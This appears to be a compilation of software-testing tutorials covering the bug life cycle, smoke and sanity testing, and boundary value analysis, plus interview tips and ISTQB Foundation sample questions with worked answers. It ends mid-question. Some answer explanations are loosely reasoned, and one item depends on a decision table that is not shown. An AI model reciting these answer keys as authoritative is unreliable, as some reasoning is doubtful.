These are the various stages of the bug life cycle. The status captions may vary depending on the bug tracking system you are using.
1) New: When QA files a new bug.
2) Deferred: If the bug is not related to the current build, cannot be fixed in this release, or is not important enough to fix immediately, the project manager can set the bug status to Deferred.
3) Assigned: The 'Assigned to' field is set by the project lead or manager, assigning the bug to a developer.
4) Resolved/Fixed: When the developer makes the necessary code changes and verifies them, he or she can set the bug status to 'Fixed', and the bug is passed to the testing team.
5) Could not reproduce: If the developer is not able to reproduce the bug using the steps given in the bug report by QA, the developer can mark the bug as 'CNR'. QA then needs to check whether the bug still reproduces and can reassign it to the developer with detailed reproduction steps.
6) Need more information: If the developer is not clear about the reproduction steps provided by QA, he or she can mark the bug as 'Need more information'. In this case QA needs to add detailed reproduction steps and assign the bug back to the developer for a fix.
7) Reopen: If QA is not satisfied with the fix and the bug is still reproducible even after the fix, QA can mark it as 'Reopen' so that the developer can take appropriate action.
8) Closed: If the bug is verified by the QA team, the fix is OK, and the problem is solved, QA can mark the bug as 'Closed'.
9) Rejected/Invalid: Sometimes the developer or team lead can mark the bug as Rejected or Invalid if the system is working according to specifications and the bug is just due to some misinterpretation.
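The statuses and transitions described above can be sketched as a simple transition table. This is a minimal illustration only: the state names follow this article, while real trackers (Bugzilla, for example) define their own states and rules.

```python
# A sketch of the bug life cycle above as a transition table.
# State names follow the article; your bug tracking tool will differ.

TRANSITIONS = {
    "New": {"Open", "Assigned", "Deferred", "Rejected"},
    "Open": {"Assigned", "Deferred"},
    "Assigned": {"Fixed", "Could not reproduce", "Need more information", "Won't fix"},
    "Could not reproduce": {"Assigned"},    # QA adds detailed steps and reassigns
    "Need more information": {"Assigned"},  # QA clarifies and reassigns
    "Fixed": {"Closed", "Reopen"},          # QA verifies the fix
    "Reopen": {"Assigned"},
}

def can_move(current: str, target: str) -> bool:
    """Return True if the status change is allowed by the table."""
    return target in TRANSITIONS.get(current, set())

assert can_move("Fixed", "Reopen")          # QA may reopen an unsatisfactory fix
assert not can_move("Closed", "Assigned")   # a closed bug is not reassigned directly
```

A table like this makes it easy to see, at a glance, which roles (QA, developer, manager) drive each transition.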
What is the actual testing process in a practical or company environment?
Today I got an interesting question from a reader: how is testing carried out in a company, i.e. in a practical environment? Those who are just out of college and starting to search for jobs are curious about what the actual working environment in companies is like. Here I focus on the actual working process of software testing in companies. By now I have good experience of a software testing career and day-to-day testing activities, so I will try to share it practically rather than theoretically.
Whenever we get a new project there is an initial project familiarity meeting. In this meeting we basically discuss who the client is, what the project duration is and when delivery is due, and who is involved in the project, i.e. the manager, tech leads, QA leads, developers, testers, etc.
From the SRS (software requirement specification), a project plan is developed. The responsibility of the testers is to create the software test plan from this SRS and project plan. Developers start coding from the design. The project work is divided into different modules, and these modules are distributed among the developers. In the meantime, the testers' responsibility is to create test scenarios and write test cases for the assigned modules. We try to cover almost all the functional test cases from the SRS. The data can be maintained manually in Excel test case templates or in bug tracking tools.
When developers finish individual modules, those modules are assigned to testers. Smoke testing is performed on these modules, and if they fail this test, the modules are reassigned to the respective developers for a fix. For modules that pass, manual testing is carried out using the written test cases. Any bug that is found gets assigned to the module's developer and logged in the bug tracking tool. When the bug is fixed, the tester does bug verification and regression testing of all related modules. If the fix passes verification, the bug is marked as verified and closed. Otherwise the above-mentioned bug cycle gets repeated. (I will cover the bug life cycle in another post.)
Different tests are performed on individual modules, and integration testing is performed on module integration. These tests include compatibility testing, i.e. testing the application on different hardware, OS versions, software platforms, and browsers. Load and stress testing is also carried out according to the SRS. Finally, system testing is performed by creating a virtual client environment. On passing all the test cases, a test report is prepared and a decision is taken to release the product!
So this was a brief outline of the project life cycle process.
Here is a detail of what testing is carried out in each step of the software quality and testing life cycle specified by the IEEE and ISO standards:
• Review of the software requirement specifications.
• Objectives are set for the major releases.
• Target dates are planned for the releases.
• A detailed project plan is built. This includes the decision on design specifications.
• A test plan is developed based on the design specifications.
  • Test plan: this includes the objectives, the methodology adopted while testing, features to be tested and not to be tested, risk criteria, the testing schedule, multi-platform support, and the resource allocation for testing.
  • Test specifications: this document includes the technical details (software requirements) required prior to testing.
• Writing of test cases:
  • Smoke (BVT) test cases
  • Sanity test cases
  • Regression test cases
  • Negative test cases
  • Extended test cases
• Development: modules are developed one by one.
• Installer binding: installers are built around the individual products.
• Build procedure: a build includes installers of the available products for multiple platforms.
• Testing:
  • Smoke test (BVT): a basic application test used to decide on further testing.
  • Testing of new features.
  • Cross-platform testing.
  • Stress testing and memory leakage testing.
• Bug reporting: a bug report is created.
• Development: code freeze. No more new features are added at this point.
• Testing: builds and regression testing.
• Decision to release the product.
• Post-release scenario for further objectives.
Smoke testing and sanity testing – Quick and simple differences
Despite hundreds of web articles on smoke and sanity testing, many people are still confused by these terms and keep asking me about them. Here is a simple and understandable difference that can clear up your confusion between smoke testing and sanity testing.
Here are the differences you can see:
SMOKE TESTING:
• Smoke testing originated in the hardware testing practice of turning on a new piece of hardware for the first time and considering it a success if it does not catch fire and smoke. In the software industry, smoke testing is a shallow and wide approach whereby all areas of the application are tested without going into too much depth.
• A smoke test is scripted, either using a written set of tests or an automated test.
• A smoke test is designed to touch every part of the application in a cursory way. It's shallow and wide.
• Smoke testing is conducted to ensure that the most crucial functions of a program are working, without bothering with finer details (such as build verification).
• Smoke testing is a normal health check-up of a build of an application before taking it into in-depth testing.
SANITY TESTING:
• A sanity test is a narrow regression test that focuses on one or a few areas of functionality. Sanity testing is usually narrow and deep.
• A sanity test is usually unscripted.
• A sanity test is used to determine that a small section of the application is still working after a minor change.
• Sanity testing is cursory testing; it is performed whenever cursory testing is sufficient to prove that the application is functioning according to specifications. This level of testing is a subset of regression testing.
• Sanity testing is done to verify whether the requirements are met or not, checking all the features breadth-first.
Hope these points will help you clearly understand smoke and sanity tests and will remove any confusion.

Thanks to VijayD for answering this question in a simple way for our readers.
If you have more points on smoke and sanity testing to elaborate on, please comment below.
What is Boundary value analysis and Equivalence partitioning?
Boundary value analysis and equivalence partitioning, explained with a simple example:
Boundary value analysis and equivalence partitioning are both test case design strategies in black box testing.
Equivalence Partitioning:
In this method, the input domain data is divided into different equivalence data classes. This method is typically used to reduce the total number of test cases to a finite set of testable test cases while still covering maximum requirements.
In short, it is the process of taking all possible test cases and placing them into classes. One test value is picked from each class while testing.
E.g.: If you are testing an input box accepting numbers from 1 to 1000, there is no use in writing a thousand test cases for all 1000 valid input numbers, plus other test cases for invalid data.
Using the equivalence partitioning method, the above test cases can be divided into three sets of input data called classes. Each test case is a representative of its respective class.

So in the above example we can divide our test cases into three equivalence classes of valid and invalid inputs.
Test cases for an input box accepting numbers between 1 and 1000, using Equivalence Partitioning:
1) One input data class with all valid inputs: pick a single value from the range 1 to 1000 as a valid test case. If you select other values between 1 and 1000, the result is going to be the same, so one test case for valid input data should be sufficient.
2) An input data class with all values below the lower limit, i.e. any value below 1, as an invalid input data test case.
3) Input data with any value greater than 1000, to represent the third, invalid input class.
So using equivalence partitioning you have categorized all possible test cases into three classes. Test cases with other values from any class should give you the same result.
We have selected one representative from each input class to design our test cases. Test case values are selected in such a way that the largest number of attributes of the equivalence class can be exercised.

Equivalence partitioning uses the fewest test cases to cover the maximum requirements.
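The three classes above can be sketched directly as test data. In the sketch below, `accepts` is a hypothetical stand-in for the input box's validation logic (it is not part of the article); one representative value is checked per equivalence class.

```python
# Hypothetical validator for an input box accepting numbers 1 to 1000.
def accepts(value: int) -> bool:
    return 1 <= value <= 1000

# Equivalence partitioning: one representative value per class.
representatives = [
    ("valid class (1..1000)", 500, True),
    ("below lower limit (<1)", -5, False),
    ("above upper limit (>1000)", 1500, False),
]

for name, value, expected in representatives:
    assert accepts(value) is expected, name
```

Any other value from the same class (say 7 or 950 instead of 500) should produce the same pass/fail result, which is exactly why one representative per class suffices.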
Boundary value analysis:
It is widely recognized that input values at the extreme ends of the input domain cause more errors in a system; more application errors occur at the boundaries of the input domain. The 'boundary value analysis' testing technique is used to identify errors at the boundaries rather than those in the center of the input domain.
Boundary value analysis is the next part of equivalence partitioning for designing test cases, where test cases are selected at the edges of the equivalence classes.
Test cases for an input box accepting numbers between 1 and 1000, using Boundary value analysis:
1) Test cases with test data exactly at the input boundaries of the input domain, i.e. values 1 and 1000 in our case.
2) Test data with values just below the extreme edges of the input domain, i.e. values 0 and 999.
3) Test data with values just above the extreme edges of the input domain, i.e. values 2 and 1001.
Boundary value analysis is often considered a part of stress and negative testing.
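The six boundary cases listed above can be checked directly. As before, `accepts` is a hypothetical validator standing in for the 1–1000 input box (an assumption for illustration, not part of the article):

```python
# Hypothetical validator for an input box accepting numbers 1 to 1000.
def accepts(value: int) -> bool:
    return 1 <= value <= 1000

# Boundary value analysis: exact boundaries, just below, and just above.
boundary_cases = [
    (1, True), (1000, True),    # exactly at the boundaries
    (0, False), (999, True),    # just below each boundary
    (2, True), (1001, False),   # just above each boundary
]

for value, expected in boundary_cases:
    assert accepts(value) is expected, value
```

Note how the expected results differ on either side of each edge (0 is invalid while 1 is valid; 1000 is valid while 1001 is invalid); off-by-one mistakes in the validation logic are caught exactly here.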
Note: There is no hard-and-fast rule to test only one value from each equivalence class you created for the input domains. You can select multiple valid and invalid values from each equivalence class according to your needs and previous judgment.
E.g. if you put the input values 1 to 1000 in the valid data equivalence class, then you can select test case values like 1, 11, 100, 950, etc. The same applies to the other test cases with invalid data classes.
This should be a very basic and simple example for understanding the boundary value analysis and equivalence partitioning concepts.
18 Tips to Handle Any Job Interview Successfully
This is a guest article by Megha S., a career counselor.
Interviews have always been a nerve-racking experience: a situation where you are judged on your performance for a job. Everybody gets the jitters when it comes to interviews. Relax! Don't panic. You need to overcome the nervousness.
Job Interview Tips and Advice Applicable to Any Job Seeker Looking for a Dream Job.

No matter which career path you choose, below are the best tips to help you land your dream job.
1. Always do your homework well before walking into an interview. Make sure you have
complete knowledge about the company and the role.
2. Know yourself. Remember, the first impression is the last impression. Demonstrate your capabilities and qualities and how well you can serve the employer. Don't be overconfident or aggressive.
3. You should know your competency skills and transferable skills. Competency skills are the skills matching your job profile, while transferable skills are those you acquired through other jobs and personal activities.
4. Social networking sites like Facebook, Orkut, and LinkedIn can be used for finding work opportunities and for conversing with other people, improving your interpersonal skills.
5. Be clear about what you want to achieve in life and about your career objective. It will keep you focused. You don't have to do anything just for the heck of it.
6. Your CV is vital for a successful interview. Never bluff; include all your skills and experience to give yourself a competitive edge.
7. Prepare well for the interview. You can make notes of the interview questions which are most likely to be asked, and practice your answers. This will boost your confidence.
8. Work on your communication skills. Remember, having good technical knowledge without effective interpersonal skills will not take you anywhere. Be expressive and a good conversationalist. Dazzle the interviewers with eloquent speech.
9. Make sure you can support your strengths by giving examples. You can prepare beforehand, but don't falter while talking; it will not create a good impression.
10. When asked about your weaknesses, acknowledge them. If you are not able to describe any, it signifies that you lack self-awareness. You can't be perfect at everything.
11. Always be presentable when dressing for the interview. Your attire should suit the role, the culture, and yourself. Please, no tacky or brash clothing and accessories; you don't need to be glammed up.
12. Spend time on personal grooming. This will keep you calm. You don't want to present yourself as a person full of nervous energy and fidgets.
13. On the big day, relax. Be comfortable and wear a smile. And voila! You will definitely crack the interview.
14. Your body language is very important. Your facial expressions, hand movements, posture, voice, and pace should all send the same message.
15. Don't forget to make eye contact. Your voice should be enthusiastic, and do not stammer. Lack of enthusiasm will put off the interviewers.
16. Keep all your documents well organized in a folder. Also be on time, preferably 15 minutes early, so you get time to settle down and calm your nerves.
17. Interview manners are very important. Bad manners will definitely be a turn-off. Don't bang the door, shake hands firmly, ask if you can take a seat, sit up straight, and do not slouch.
18. When asked about remuneration, you don't have to be blunt. Instead you can say that you expect fair compensation in line with your qualifications and experience, proportionate with your peers.
Now that you have some good interview tips, be confident, gear up, and don't let yourself down. Remember, it is not the end of life if you don't get through the process. It's just an interview. Good Luck!
Preparing For Software Testing Interview – Simple Tips To Follow Prior to and at the Time of the Interview
As Software testers, we keep performing testing activities in various phases of a project.
When it comes to testing our own skills, we may not end up choosing an appropriate
approach. I am talking about how the interview rounds go and how to face them. The whole
article is a very general discussion about the challenges that a tester has to face in an
interview.
Let's start with preparing a CV for a software testing job profile.
How to prepare a good CV?
By the term 'good' I mean a CV that best describes your skills, your expertise, your strengths, etc. It's better not to use the same CV for different types of job profiles; making slight changes will help you get a call. For example, you can highlight the skill set that you possess for the required job, like a specific automation tool or experience in other related automation tools. You can also mention basic knowledge of any technologies that you possess. This may be an added advantage.
Preparation before the job interview:
Before attending the interview, check the job profile in detail. Understand whether the requirement is purely manual testing, automation testing, or both. Check whether your experience matches what is expected for the job profile.
The interviewer will mostly stick to questions around the given job profile and what you have mentioned in your CV. Make sure you can confidently answer questions based on your CV. Depending on how the discussion between the candidate and the interviewer goes, it may lead into other areas.
Appear confident at the time of the interview:
In most cases, the interview starts with a brief introduction of the candidate. You can answer this by following a sequence: start with your name, the qualifications you possess, how you started your career as a software tester, etc. Some interviewers do not like to hear personal details, like family matters, so do not volunteer these details unless the interviewer asks for them.
While answering any question, tell what you know. Do not try to explain ideal cases; interviewers are interested in a practical approach rather than ideal cases. Tell the interviewer how you would go about solving the problem, or about your way of tackling things. Do not say anything negative about any person, especially about developers/programmers; if you do, it shows that you are not mature enough. Nowadays in most interviews, scenarios are presented rather than direct questions and answers. If a scenario is new to you, take a few seconds to think about it and then answer. Do not hurry things.
The way you present yourself in interviews is very important, and the right attitude is very important too. Many managers can easily judge whether you have really worked on projects or it's just fake experience. The confidence level with which you answer makes a strong impression. For any question where you are not sure about the correct answer, just make an attempt; do not simply give up. You can also talk about things that you explored in your free time or out of interest. This shows that you take initiative and are a continuous learner as well.

As many of us must have experienced, interviewers keep asking about the processes that you have followed or are familiar with. You do not need to worry if you have never followed any formal processes. Following processes is up to the company, and a tester cannot do much about that. But of course you can follow some processes for your own tasks (I mean the modules that you own or are in charge of, etc.). This will not only help you manage things but also inspire others to follow some processes. Any process which has proven good results can be followed. So, instead of blaming others for not following any processes, you can take the initiative to do it. Do not forget that initiative is one of the qualities that a tester should possess.
One more important point: it's not necessary that the person taking your interview has a QA background. A person with a development background can also conduct software testing job interviews. What I mean is that the person need not have actually worked on QA processes. In such a case it becomes very important to answer the questions very carefully. It may sound illogical for a person from a non-QA background to interview a tester, but remember it will be a very good experience, as you will get to know how testing is perceived by others.
Over to You:
What's your experience with software testing interviews? If you want to share some dos and don'ts, please comment below so that other testers can benefit from your experience. And finally, all the best for your testing career!
ISTQB question pattern and tips to solve
Please welcome Sandhya to the softwaretestinghelp.com writers' board. Sandhya has extensive experience in the software testing field and has helped many software testers clear testing certification exams like ISTQB.

Sandhya will be giving you the ISTQB paper pattern and tips on how to solve the questions quickly. To start with, here are 10 sample ISTQB 'Foundation level' questions with detailed explanations of the answers.
ISTQB question pattern and tips to solve:
ISTQB questions are formatted in such a way that the answer options look very similar. People often choose the one they are more familiar with. Read the question carefully, twice or three times or more if needed, until you are clear about what is being asked.
Now look at the options carefully. They are deliberately chosen to confuse candidates. To find the correct answer, start eliminating options one by one: go through each option and check whether it is appropriate. If you end up selecting more than one option, repeat the same elimination logic on the ones you selected. This approach works reliably.

Before you start with the question papers, read the study material thoroughly and practice as many papers as possible. This helps a lot, because when we actually solve the papers we apply the logic we already know.

ISTQB ‘Foundation level’ sample questions with answers:


1. Designing the test environment set-up and identifying any required
infrastructure and tools are a part of which phase
a) Test Implementation and execution
b) Test Analysis and Design
c) Evaluating the Exit Criteria and reporting
d) Test Closure Activities
Evaluating the options:
a) Option a: as the name suggests, these are the activities of actually implementing and executing the tests; designing the set-up does not fall here.
b) Option b: analysis and design activities come before implementation. Designing the test environment set-up and identifying any required infrastructure and tools are part of this activity.
c) Option c: these are post-execution activities.
d) Option d: these are the closing activities, the last phase of the process.
So, the answer is ‘B’
2. Test Implementation and execution has which of the following major tasks?
i. Developing and prioritizing test cases, creating test data, writing test procedures and
optionally preparing the test harnesses and writing automated test scripts.
ii. Creating the test suite from the test cases for efficient test execution.
iii. Verifying that the test environment has been set up correctly.
iv. Determining the exit criteria.
a) i,ii,iii are true and iv is false
b) i,iv are true and ii,iii are false
c) i,ii are true and iii,iv are false
d) ii,iii,iv are true and i is false
Evaluating the options:
Let’s follow a different approach in this case. As can be seen from the above options,
determining the exit criteria is definitely not a part of test implementation and execution. So
choose the options where (iv) is false. This filters out ‘b’ and ‘d’.
We need to select only from ‘a’ and ‘c’. We only need to analyze option (iii) as (i) and (ii)
are marked as true in both the cases. Verification of the test environment is part of the
implementation activity. Hence option (iii) is true. This leaves the only option as ‘a’.

So, the answer is ‘A’


3. A Test Plan Outline contains which of the following:-
i. Test Items
ii. Test Scripts
iii. Test Deliverables
iv. Responsibilities
a) i,ii,iii are true and iv is false
b) i,iii,iv are true and ii is false
c) ii,iii are true and i and iv are false
d) i,ii are false and iii , iv are true
Evaluating the options:
Let’s use the approach given in question no. 2. Test scripts are not part of the test plan (this
must be clear). So choose the options where (ii) is false. So we end up selecting ‘b’ and ‘d’.
Now evaluate the option (i), as option (iii) and (iv) are already given as true in both the
cases. Test items are part of the test plan. Test items are the modules or features which will
be tested and these will be part of the test plan.
So, the answer is ‘B’
4. One of the fields on a form contains a text box which accepts numeric values in
the range of 18 to 25. Identify the invalid Equivalence class
a) 17
b) 19
c) 24
d) 21
Evaluating the options:
In this case, first we should identify valid and invalid equivalence classes.
Invalid Class | Valid Class | Invalid Class
Below 18 | 18 to 25 | 26 and above
Option ‘a’ falls under invalid class. Options ‘b’, ‘c’ and ‘d’ fall under valid class.

So, the answer is ‘A’
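The class split above can be sketched in code. This is a minimal illustration; the function name and class labels are invented for this example:

```python
# Minimal sketch of the partitioning above (function name and class
# labels are invented for this illustration).

def partition(value):
    """Classify an input against the valid range 18-25."""
    if value < 18:
        return "invalid-low"    # invalid class: below 18
    if value <= 25:
        return "valid"          # valid class: 18 to 25
    return "invalid-high"       # invalid class: 26 and above

# One representative value per class is enough for this technique.
assert partition(17) == "invalid-low"   # option 'a': the invalid value
assert partition(19) == "valid"         # options 'b', 'c', 'd' are valid
assert partition(24) == "valid"
assert partition(21) == "valid"
assert partition(30) == "invalid-high"
```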


5. In an examination a candidate has to score a minimum of 24 marks in order to clear the exam. The maximum he can score is 40 marks. Identify the valid equivalence values if the student clears the exam.
a) 22,23,26
b) 21,39,40
c) 29,30,31
d) 0,15,22
Evaluating the options:
Let’s use the approach given in question 4. Identify valid and invalid equivalence classes.
Invalid Class | Valid Class | Invalid Class
Below 24 | 24 to 40 | 41 and above
The question is to identify valid equivalence values. So all the values must be from ‘Valid
class’ only.

a) Option a: not all the values are from the valid class (22 and 23 are below 24)
b) Option b: not all the values are from the valid class (21 is below 24)
c) Option c: all the values are from the valid class
d) Option d: none of the values are from the valid class
So, the answer is ‘C’
6. Which of the following statements regarding static testing is false:
a) static testing requires the running of tests through the code
b) static testing includes desk checking
c) static testing includes techniques such as reviews and inspections
d) static testing can give measurements such as cyclomatic complexity
Evaluating the options:
a) Option a: this statement is false; static testing never involves running the code (that is dynamic testing)
b) Option b: correct, static testing does include desk checking
c) Option c: correct, it includes reviews and inspections
d) Option d: correct, it can give measurements such as cyclomatic complexity
So, the answer is ‘A’
7. Verification involves which of the following:-
i. Helps to check the Quality of the built product
ii. Helps to check that we have built the right product.
iii. Helps in developing the product
iv. Monitoring tool wastage and obsoleteness.
a) Options i,ii,iii,iv are true.
b) i is true and ii,iii,iv are false
c) i,ii,iii are true and iv is false
d) ii is true and i,iii,iv are false.
Evaluating the options:
a) Option a: not all statements are true. Verification checks the quality of the product as it is being built (are we building the product right?), so (i) is true, but the rest are not.
b) Option b: correct. Only (i) is true; checking that we have built the right product is validation, not verification, so (ii) is false.
c) Option c: (iii) is false; verification does not help in developing the product.
d) Option d: (iv) is false; verification does not involve monitoring activities such as tool wastage and obsolescence.
So, the answer is 'B'
8. Component Testing is also called as :-
i. Unit Testing
ii. Program Testing
iii. Module Testing
iv. System Component Testing .
a) i,ii,iii are true and iv is false
b) i,ii,iii,iv are false
c) i,ii,iv are true and iii is false
d) all of above is true
Evaluating the options:
a) Option a: correct, component testing is also called unit testing
b) Option b: component testing is also called program testing (all the plausible answer options treat this statement as true)
c) Option c: correct, component testing is also called module testing
d) Option d: wrong, system component testing comes under system testing
So, the answer is ‘A’
9. Link Testing is also called as :
a) Component Integration testing
b) Component System Testing
c) Component Sub System Testing
d) Maintenance testing
Evaluating the options:
As the name suggests, this testing is performed by linking (say modules). Now if
we look at the options, only option ‘a’ is performed by linking or integrating
modules/components.
So, the answer is ‘A’
10. What is the expected result for each of the following test cases?
A. TC1: Anand is a 32-year-old married person residing in Kolkata.
B. TC3: Attapattu is a 65-year-old married person residing in Colombo.
a) A – Issue membership, 10% discount; B – Issue membership, offer no discount.
b) A – Don't issue membership; B – Don't offer discount.
c) A – Issue membership, no discount; B – Don't issue membership.
d) A – Issue membership, no discount; B – Issue membership with 10% discount.
Evaluating the options:

Explanation (based on the decision table accompanying this question):
For TC1: follow the first path. The person is an Indian resident, so select the 'True' branch; he is aged between 18 and 55, so select 'True' again; he is married, so select 'True' once more. The actions under 'Rule 4' apply: issue membership and no discount.
For TC3: follow the second path. The person is not an Indian resident, so select the 'False' branch (under Rule 1). The age and marital-status conditions are marked "Don't care", so no further branch needs to be selected. The actions under 'Rule 1' apply: don't issue membership and no discount.
So, the answer is ‘C’
Note: The answers are based on writers own experience and judgment and may not be
100% correct. If you feel any correction is required please discuss in comments below.

ISTQB software testing certification sample question paper with answers – Part II
In continuation of our previous article "ISTQB software testing certification sample papers and tips to solve the questions quickly", we are posting the next set of ISTQB exam sample questions and answers with a detailed evaluation of each option.
This is a guest article by "N. Sandhya Rani".
ISTQB ‘Foundation level’ sample questions with answers and detailed evaluation
of each option:
1. Methodologies adopted while performing Maintenance Testing:-
a) Breadth Test and Depth Test
b) Retesting
c) Confirmation Testing
d) Sanity Testing
Evaluating the options:
a) Option a: breadth testing is a test suite that exercises the full functionality of a product but does not test features in detail; depth testing exercises a feature of a product in full detail.
b) Option b: retesting is part of regression testing.
c) Option c: confirmation testing is a synonym for retesting.
d) Option d: sanity testing does not cover the full functionality.
Maintenance testing tests some features in detail (e.g. the changed environment) while other features need no detailed testing; it is a mix of both breadth and depth testing.
So, the answer is ‘A’
2. Which of the following is true about Formal Review or Inspection:-
i. Led by Trained Moderator (not the author).
ii. No Pre Meeting Preparations
iii. Formal Follow up process.
iv. Main Objective is to find defects
a) ii is true and i,iii,iv are false
b) i,iii,iv are true and ii is false
c) i,iii,iv are false and ii is true
d) iii is true and i,ii,iv are false
Evaluating the options:
Consider the first point (i). This is true, Inspection is led by trained moderator. Hence we
can eliminate options (a) and (d). Now consider second point. In Inspection pre-meeting
preparation is required. So this point is false. Look for option where (i) is true and (ii) is
false.
The answer is ‘B’
3. The Phases of formal review process is mentioned below arrange them in the
correct order.

i. Planning
ii. Review Meeting
iii. Rework
iv. Individual Preparations
v. Kick Off
vi. Follow Up
a) i,ii,iii,iv,v,vi
b) vi,i,ii,iii,iv,v
c) i,v,iv,ii,iii,vi
d) i,ii,iii,v,iv,vi
Evaluating the options:
The formal review process is Inspection. Planning is the foremost step, so we can eliminate option 'b'. Next the process must be kicked off, so the second step is Kick Off. That alone identifies the answer.
The answer is 'C'

4. Consider the following state transition diagram of a two-speed hair dryer, which
is operated by pressing its one button. The first press of the button turns it on to
Speed 1, second press to Speed 2 and the third press turns it off.

Which of the following series of state transitions below will provide 0-switch coverage?
a. A,C,B
b. B,C,A
c. A,B,C
d. C,B,A
Evaluating the options:
In state transition testing a test is defined for each state transition. The coverage achieved by exercising every single transition once is called 0-switch (branch) coverage. We start from the initial state and cover each individual transition; sequences of two consecutive transitions are not tested. Here the start state is 'OFF': the first press of the button turns the dryer to Speed 1 (transition A), the second press to Speed 2 (transition B), and the third press turns it off (transition C). Combinations starting from 'Speed 1' or 'Speed 2' are not tested.
An alternative shortcut is to check for the options that start from the 'OFF' state, which leaves 'a' and 'c'. As per the state diagram, from 'OFF' the dryer goes to 'Speed 1' and then to 'Speed 2', so the answer must start with 'A' and end with 'C'.

The answer is ’C’
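The hair-dryer transitions can be modelled directly. The sketch below (state names are illustrative) shows that the only 0-switch path from 'OFF' is A, B, C:

```python
# Sketch of the hair-dryer state machine (state names are invented;
# the single button is the only event, so each state has one successor).

TRANSITIONS = {
    "OFF": "Speed1",     # transition A: first press
    "Speed1": "Speed2",  # transition B: second press
    "Speed2": "OFF",     # transition C: third press
}

def press(state):
    """Return the state reached by one press of the button."""
    return TRANSITIONS[state]

# 0-switch coverage: start at 'OFF' and take each transition once.
state = "OFF"
visited = []
for _ in range(3):
    state = press(state)
    visited.append(state)
assert visited == ["Speed1", "Speed2", "OFF"]  # path A, B, C
```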


5. White Box Techniques are also called as :-
a) Structural Testing
b) Design Based Testing
c) Error Guessing Technique
d) Experience Based Technique
Evaluating the options:
No evaluation is really needed here; it is a straight answer. White-box techniques are also called structural testing, since they are based on the structure of the code.
The answer is ‘A’
6. What is an equivalence partition (also known as an equivalence class)?
a) A set of test cases for testing classes of objects
b) An input or output range of values such that only one value in the range becomes a test
case
c) An input or output range of values such that each value in the range becomes a test case
d) An input or output range of values such that every tenth value in the range becomes a
test case.
Evaluating the options:
Let's recall the definition of an equivalence partition: inputs are grouped into valid and invalid classes, and any one value from a class represents the whole class. For example, if a valid class covers the values 3 to 5, any single value between 3 and 5 serves as the input, and all values in the class are expected to yield the same output. Hence one value in the range becomes a test case.
The answer is ‘B’
7. The Test Cases Derived from use cases
a) Are most useful in uncovering defects in the process flows during real world use of the
system
b) Are most useful in uncovering defects in the process flows during the testing use of the
system
c) Are most useful in covering the defects in the process flows during real world use of the
system
d) Are most useful in covering the defects at the Integration Level
Evaluating the options:
Please refer to Use case related topic in the foundation level guide “Use cases describe the
“process flows” through a system based on its actual likely use” (actual likely use is nothing
but the real world use of the system). Use cases are useful for uncovering defects. Hence
we can eliminate options (c ) and (d). Use case uncovers defects in process flow during real
world use of the system.
The answer is ‘A’
8. Exhaustive Testing is
a) Is impractical but possible
b) Is practically possible
c) Is impractical and impossible
d) Is always possible
Evaluating the options:
From the definition given in the syllabus, exhaustive testing (testing all combinations of inputs and preconditions) is infeasible except in trivial cases. It is not always possible, so eliminate option 'd'. It is not strictly impossible either, so eliminate option 'c'. But even where it is possible, it is impractical. Hence we can conclude that exhaustive testing is impractical but possible.
The answer is ‘A’
9. Which of the following is not a part of the Test Implementation and Execution
Phase
a) Creating test suites from the test cases
b) Executing test cases either manually or by using test execution tools
c) Comparing actual results
d) Designing the Tests
Evaluating the options:
Please take care of the word ‘not’ in the question. Test implementation does include
Creating test suites, executing and comparing results. Hence eliminate options a, b and c.
The only option left is ‘D’. Designing activities come before implementation.
The answer is ‘D’
10. Which of the following techniques is NOT a White box technique?
a) Statement Testing and coverage
b) Decision Testing and coverage
c) Condition Coverage
d) Boundary value analysis
Evaluating the options:
Please take care of the word ‘not’ in the question. We have to choose the one which is not a
part of white box technique. Statement, decision, condition are the terms used in white box.
So eliminate options a, b and c. Boundary value is part of black box.
The answer is ‘D’
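As a contrast with the white-box options, boundary value analysis can be illustrated with a short black-box sketch. The helper name and the two-value convention are assumptions for this illustration:

```python
# Black-box sketch of two-value boundary value analysis for the range
# 18-25 (the helper name and the two-value convention are assumptions
# for this illustration, not from the syllabus).

def boundary_values(low, high):
    """Each boundary plus its nearest out-of-range neighbour."""
    return [low - 1, low, high, high + 1]

# No knowledge of the code is needed, which is why BVA is black box.
assert boundary_values(18, 25) == [17, 18, 25, 26]
```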
11. A Project risk includes which of the following
a) Organizational Factors
b) Poor Software characteristics
c) Error Prone software delivered.
d) Software that does not perform its intended functions
Evaluating the options:
a) Option a: organizational factors are project risks.
b) Option b: poor software characteristics are a product risk, not a project risk.
c) Option c: error-prone software delivered is again a product risk.
d) Option d: software that does not perform its intended functions is again a product risk.
The answer is ‘A’
12. In a risk-based approach the risks identified may be used to :
i. Determine the test technique to be employed
ii. Determine the extent of testing to be carried out
iii. Prioritize testing in an attempt to find critical defects as early as possible.
iv. Determine the cost of the project
a) ii is True; i, iii, iv are False
b) i,ii,iii are true and iv is false
c) ii & iii are True; i, iv are False
d) ii, iii & iv are True; i is false
Evaluating the options:
a) Option a: risks identified can be used to determine the test technique, so (i) is true.
b) Option b: risks can be used to determine the extent of testing required. For example, if there are P1 bugs in the software, releasing it is a risk, so the testing cycle can be extended to reduce that risk.
c) Option c: if risk areas are identified beforehand, we can prioritize testing to find critical defects as early as possible.
d) Option d: risk does not determine the cost of the project; it determines the impact on the project as a whole.
Check for the option where the first three points are true: it's 'B'.
The answer is ‘B’
13. Which of the following is the task of a Tester?
i. Interaction with the Test Tool Vendor to identify best ways to leverage test tool on the
project.
ii. Prepare and acquire Test Data
iii. Implement Tests on all test levels, execute and log the tests.
iv. Create the Test Specifications
a) i, ii, iii is true and iv is false
b) ii,iii,iv is true and i is false
c) i is true and ii,iii,iv are false
d) iii and iv is correct and i and ii are incorrect
Evaluating the options:
Not much explanation is needed in this case. As a tester, we perform all the activities mentioned in points (ii), (iii) and (iv); interacting with the test tool vendor is typically a test leader's task.
The answer is ‘B’
14. The Planning phase of a formal review includes the following :-
a) Explaining the objectives
b) Selecting the personnel, allocating roles.
c) Follow up
d) Individual Meeting preparations
Evaluating the options:
In this case, elimination works best. Follow-up is not a planning activity but a post-review task, so eliminate option 'c'. Individual meeting preparation is an activity for each reviewer, not a planning activity, so eliminate option 'd'. We are left with options 'a' and 'b'; read them two or three times. Option 'b' is the most appropriate: the planning phase of a formal review does include selecting the personnel and allocating roles, whereas explaining the objectives is not part of the planning phase (this is also written in the Foundation Level syllabus).
The answer is ‘B’
15. A Person who documents all the issues, problems and open points that were
identified during a formal review.
a) Moderator.
b) Scribe
c) Author
d) Manager
Evaluating the options:
